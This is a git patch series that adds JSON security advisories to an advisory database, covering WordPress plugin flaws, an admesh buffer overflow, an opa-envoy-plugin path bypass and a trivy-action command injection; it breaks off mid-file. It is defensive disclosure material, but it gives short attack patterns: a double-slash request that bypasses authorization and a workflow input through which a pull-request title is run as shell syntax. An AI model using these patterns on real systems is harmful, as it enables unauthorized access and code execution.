GHSA-3vq8-64jx-f882 GHSA-9pr5-g9xr-gp22 GHSA-fq68-cwcx-p92f GHSA-pm8v-w3f2-2hxx GHSA-vcj6-96x2-26j3 GHSA-w2w8-j4gc-v26q --- .../GHSA-23h7-68rq-jgvf.json | 56 ++++++++++++++++ .../GHSA-2pc4-pm2m-q53r.json | 48 ++++++++++++++ .../GHSA-3vq8-64jx-f882.json | 44 +++++++++++++ .../GHSA-9pr5-g9xr-gp22.json | 48 ++++++++++++++ .../GHSA-fq68-cwcx-p92f.json | 52 +++++++++++++++ .../GHSA-pm8v-w3f2-2hxx.json | 48 ++++++++++++++ .../GHSA-vcj6-96x2-26j3.json | 64 +++++++++++++++++++ .../GHSA-w2w8-j4gc-v26q.json | 48 ++++++++++++++ 8 files changed, 408 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json diff --git a/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json b/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json new file mode 100644 index 0000000000000..5630e02bd42b0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23h7-68rq-jgvf", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-13727" + ], + "details": "The Video Share VOD – Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 2.7.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13727" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/tags/2.7.11/inc/shortcodes.php#L2226" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/tags/2.7.11/inc/shortcodes.php#L748" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/trunk/inc/shortcodes.php#L2226" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/trunk/inc/shortcodes.php#L748" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463296" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/776a441b-1bb8-46ea-9884-4abf562f6e5c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json b/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json new file mode 100644 index 0000000000000..e79fa4e9211d6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2pc4-pm2m-q53r", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2025-14799" + ], + "details": "The Brevo - Email, SMS, Web Push, Chat, and more. plugin for WordPress is vulnerable to authorization bypass due to type juggling in all versions up to, and including, 3.3.0. This is due to the use of loose comparison (==) instead of strict comparison (===) when validating the installation ID in the `/wp-json/mailin/v1/mailin_disconnect` REST API endpoint. This makes it possible for unauthenticated attackers to disconnect the Brevo integration, delete the API key, remove all subscription forms, and reset plugin settings by sending a boolean `true` value for the `id` parameter, which bypasses the authorization check through PHP type juggling.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14799" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mailin/tags/3.2.9/sendinblue.php#L1795" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mailin/tags/3.2.9/sendinblue.php#L1833" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3448639" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f29e5b19-2505-4b02-92c7-071833de6bc2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T12:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json b/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json new file mode 100644 index 0000000000000..bb163125f7acc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vq8-64jx-f882", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-11185" + ], + "details": "The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cmplz-accept-link shortcode in all versions up to, and including, 7.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11185" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.2/documents/class-document.php#L1174" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.2/documents/class-document.php#L21" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f0533fca-a4de-44f0-bea0-1df6a41709ca?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json b/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json new file mode 100644 index 0000000000000..e0d8672576c9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pr5-g9xr-gp22", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-1942" + ], + "details": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the b2s_curation_draft AJAX action in all versions up to, and including, 8.7.4. The curationDraft() function only verifies current_user_can('read') without checking whether the user has edit_post permission for the target post. Combined with the plugin granting UI access and nonce exposure to all roles, this makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the title and content of arbitrary posts and pages by supplying a target post ID via the 'b2s-draft-id' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1942" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.3/includes/Ajax/Post.php#L159" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.3/includes/B2S/Curation/Save.php#L39" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php?rev=3462464" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/930e7fd6-ae0b-465a-aa93-04ef80011d32?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json b/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json new file mode 100644 index 0000000000000..079d7a6c660d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq68-cwcx-p92f", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-14444" + ], + "details": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to payment bypass due to insufficient verification of data authenticity on the 'process_paypal_sdk_payment' function in all versions up to, and including, 6.0.6.9. This is due to the plugin trusting client-supplied values for payment verification without validating that the payment actually went through PayPal. This makes it possible for unauthenticated attackers to bypass paid registration by manipulating payment status and activating their account without completing a real PayPal payment.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14444" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/tags/6.0.6.7/includes/class_registration_magic.php#L232" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/tags/6.0.6.7/services/class_rm_paypal_service.php#L324" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/services/class_rm_paypal_service.php#L324" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3426151" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0633bf06-6580-4feb-b98a-c465df3e2bed?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json new file mode 100644 index 0000000000000..fac368002aa55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm8v-w3f2-2hxx", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2026-2126" + ], + "details": "The User Submitted Posts – Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 20260113. This is due to the `usp_get_submitted_category()` function accepting user-submitted category IDs from the POST body without validating them against the admin-configured allowed categories stored in `usp_options['categories']`. This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones, by crafting a direct POST request with manipulated `user-submitted-category[]` values, bypassing the frontend category restrictions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3463696%40user-submitted-posts%2Ftrunk&old=3456521%40user-submitted-posts%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json new file mode 100644 index 0000000000000..9a1c8c221619a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcj6-96x2-26j3", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2653" + ], + "details": "A security flaw has been discovered in admesh up to 0.98.5. This issue affects the function stl_check_normal_vector of the file src/normals.c. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. It looks like this product is not really maintained anymore.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2653" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65#issuecomment-3804571402" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh" + }, + { + "type": "WEB", + "url": "https://github.com/user-attachments/files/24878279/id.000035.sig.06.src.000550.time.910126.execs.241742.op.havoc.rep.5.zip" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752596" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json new file mode 100644 index 0000000000000..a744ef0b04dbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2w8-j4gc-v26q", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2426" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2426" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/d3470a8971d9043438c8aad281cf37d14fefa208" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file From 0be8ae264144d278ce4b2506bc750e2337001b9f Mon Sep 17 00:00:00 2001 From: Maksim Moiseikin Date: Wed, 18 Feb 2026 16:14:41 +0100 Subject: [PATCH 004/174] Improve GHSA-xfhx-r7ww-5995 --- .../GHSA-xfhx-r7ww-5995.json | 28 ++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json index c5bfb830d442c..2911ab16e66df 100644 --- a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json +++ b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xfhx-r7ww-5995", - "modified": "2026-01-15T20:11:41Z", + "modified": "2026-01-15T20:11:51Z", "published": "2026-01-15T15:31:19Z", "aliases": [ "CVE-2026-0897" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 3.13.0" } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.12.0" + } } ], "references": [ @@ -47,6 +69,10 @@ "type": "WEB", "url": "https://github.com/keras-team/keras/pull/21880" }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22081" + }, { "type": "WEB", "url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6" From 4ef3aa115961db820ee061dc512929b90bd4c052 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:26:18 +0000 Subject: [PATCH 005/174] Publish Advisories GHSA-9f29-v6mm-pw6w GHSA-9p44-j4g5-cfx5 --- .../GHSA-9f29-v6mm-pw6w.json | 68 +++++++++++++++++++ .../GHSA-9p44-j4g5-cfx5.json | 65 ++++++++++++++++++ 2 files changed, 133 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json diff --git a/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json b/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json new file mode 100644 index 0000000000000..0808e742888aa --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f29-v6mm-pw6w", + "modified": "2026-02-18T15:25:04Z", + "published": "2026-02-18T15:25:04Z", + "aliases": [ + "CVE-2026-26205" + ], + "summary": "opa-envoy-plugin has a Authorization Bypass via Double-Slash Path Misinterpretation in input.parsed_path", + "details": "A security vulnerability has been discovered in how the `input.parsed_path` field is constructed. HTTP request paths are treated as full URIs when parsed; interpreting leading path segments prefixed with double slashes (`//`) as [authority](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2) components, and therefore dropping them from the parsed path. This creates a path interpretation mismatch between authorization policies and backend servers, enabling attackers to bypass access controls by crafting requests where the authorization filter evaluates a different path than the one ultimately served.\n\n#### Attack example\n\n**HTTP request:**\n\n```\nGET //admin/users HTTP/1.1\nHost: example.com\n```\n\n**Policy sees:**\n\nThe leading `//admin` path segment is interpreted as an authority component, and dropped from `input.parsed_path` field:\n\n\n```json\n{\n \"parsed_path\": [\"users\"]\n}\n```\n\n**Backend receives:**\n\n`//admin/users` path, normalized to `/admin/users`.\n\n#### Affected Request Pattern Examples\n\n| Request path | `input.parsed_path` | `input.attributes.request.http.path` | Discrepancy |\n| - | - | - | - |\n| / | [\"\"] | / | ✅ None |\n| //foo | [\"\"] | //foo| ❌ Mismatch |\n| /admin | [\"admin\"] | /admin | ✅ None |\n| /admin/users | [\"admin\", \"users\"] | /admin/users | ✅ None |\n| //admin/users | [\"users\"] | //admin/users | ❌ Mismatch |\n\n### Impact\n\nUsers are impacted if all the following conditions apply:\n\n1. Protected resources are path-hierarchical (e.g., `/admin/users` vs `/users`)\n2. Authorization policies use `input.parsed_path` for path-based decisions\n3. Backend servers apply lenient path normalization\n\n### Patches\n\nGo: `v1.13.2-envoy-2`\nDocker: `1.13.2-envoy-2`, `1.13.2-envoy-2-static`\n\n### Workarounds\n\nUsers who cannot immediately upgrade opa-envoy-plugin are recommended to apply one, or more, of the workarrounds described below.\n\n#### 1. Enable the `merge_slashes` Envoy configuration option\n\nAs per [Envoy best practices](https://www.envoyproxy.io/docs/envoy/v1.37.0/configuration/best_practices/edge.html), enabling the [merge_slashes](https://www.envoyproxy.io/docs/envoy/latest/api-v3/extensions/filters/network/http_connection_manager/v3/http_connection_manager.proto#envoy-v3-api-field-extensions-filters-network-http-connection-manager-v3-httpconnectionmanager-merge-slashes) configuration option in Envoy will remove redundant slashes from the request path before filtering is applied, effectively mitigating the `input.parsed_path` issue described in this advisory.\n\n\n#### 2. Use `input.attributes.request.http.path` instead of `input.parsed_path` in policies\n\nThe `input.attributes.request.http.path` field contains the unprocessed, raw request path. Users are recommended to update any policy using `input.parsed_path` to instead use the `input.attributes.request.http.path` field.\n\n##### Example ####\n\n```rego\npackage example\n\n# Use instead of input.parsed_path\nparsed_path := split( # tokenize into array\n\ttrim_left( # drop leading slashes\n\t\turlquery.decode(input.attributes.request.http.path), # url-decode the path\n\t\t\"/\",\n\t),\n\t\"/\",\n)\n```", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/open-policy-agent/opa-envoy-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.13.2-envoy-2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.13.1-envoy" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin/security/advisories/GHSA-9f29-v6mm-pw6w" + }, + { + "type": "WEB", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin/commit/58c44d4ec408d5852d1d0287599e7d5c5e2bc5c3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin" + }, + { + "type": "WEB", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin/releases/tag/v1.13.2-envoy-2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T15:25:04Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json b/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json new file mode 100644 index 0000000000000..7fb49ffd749a1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p44-j4g5-cfx5", + "modified": "2026-02-18T15:24:43Z", + "published": "2026-02-18T15:24:43Z", + "aliases": [ + "CVE-2026-26189" + ], + "summary": "Trivy Action has a script injection via sourced env file in composite action", + "details": "Command Injection in aquasecurity/trivy-action via Unsanitized Environment Variable Export\n\n\nA command injection vulnerability exists in `aquasecurity/trivy-action` due to improper handling of action inputs when exporting environment variables. The action writes `export VAR=` lines to `trivy_envs.txt` based on user-supplied inputs and subsequently sources this file in `entrypoint.sh`.\n\nBecause input values are written without appropriate shell escaping, attacker-controlled input containing shell metacharacters (e.g., `$(...)`, backticks, or other command substitution syntax) may be evaluated during the sourcing process. This can result in arbitrary command execution within the GitHub Actions runner context.\n\n**Severity:**\n\nModerate\n\nCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)\n\n**Impact:**\n\nSuccessful exploitation may lead to arbitrary command execution in the CI runner environment.\n\n\n**Affected Versions:**\n\n* Versions >= 0.31.0 and <= 0.33.1\n* Introduced in commit `7aca5ac`\n\n**Affected Conditions:**\n\nThe vulnerability is exploitable when a consuming workflow passes attacker-controlled data into any action input that is written to `trivy_envs.txt`. Access to user input is required by the malicious actor.\n\nA representative exploitation pattern involves incorporating untrusted pull request metadata into an action parameter. For example:\n\n```yaml\n- uses: aquasecurity/trivy-action@0.33.1\n with:\n output: \"trivy-${{ github.event.pull_request.title }}.sarif\"\n```\n\nIf the pull request title contains shell syntax, it may be executed when the generated environment file is sourced.\n\n**Not Affected:**\n\n* Workflows that do not pass attacker-controlled data into `trivy-action` inputs\n* Workflows that upgrade to a patched version that properly escapes shell values or eliminates the `source ./trivy_envs.txt` pattern\n* Workflows where user input is not accessible.\n\n**Call Sites:**\n\n* `action.yaml:188` — `set_env_var_if_provided` writes unescaped `export` lines\n* `entrypoint.sh:9` — sources `./trivy_envs.txt`", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "GitHub Actions", + "name": "aquasecurity/trivy-action" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.31.0" + }, + { + "fixed": "0.34.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/aquasecurity/trivy-action/security/advisories/GHSA-9p44-j4g5-cfx5" + }, + { + "type": "WEB", + "url": "https://github.com/aquasecurity/trivy-action/commit/7aca5acc9500b463826cc47a47a65ad7d404b045" + }, + { + "type": "WEB", + "url": "https://github.com/aquasecurity/trivy-action/commit/bc61dc55704e2d5704760f3cdab0d09acf16e4ca" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aquasecurity/trivy-action" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + 